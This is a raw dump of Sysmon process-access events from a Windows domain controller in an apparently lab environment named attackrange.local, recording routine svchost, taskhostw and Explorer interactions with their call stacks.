13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.055{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.055{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.055{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.055{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.055{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.055{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.055{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.055{59A5CD1D-93FB-6005-FE04-00000000A301}51084896C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.992{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.961{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.961{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.961{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.961{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.961{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.961{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.961{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 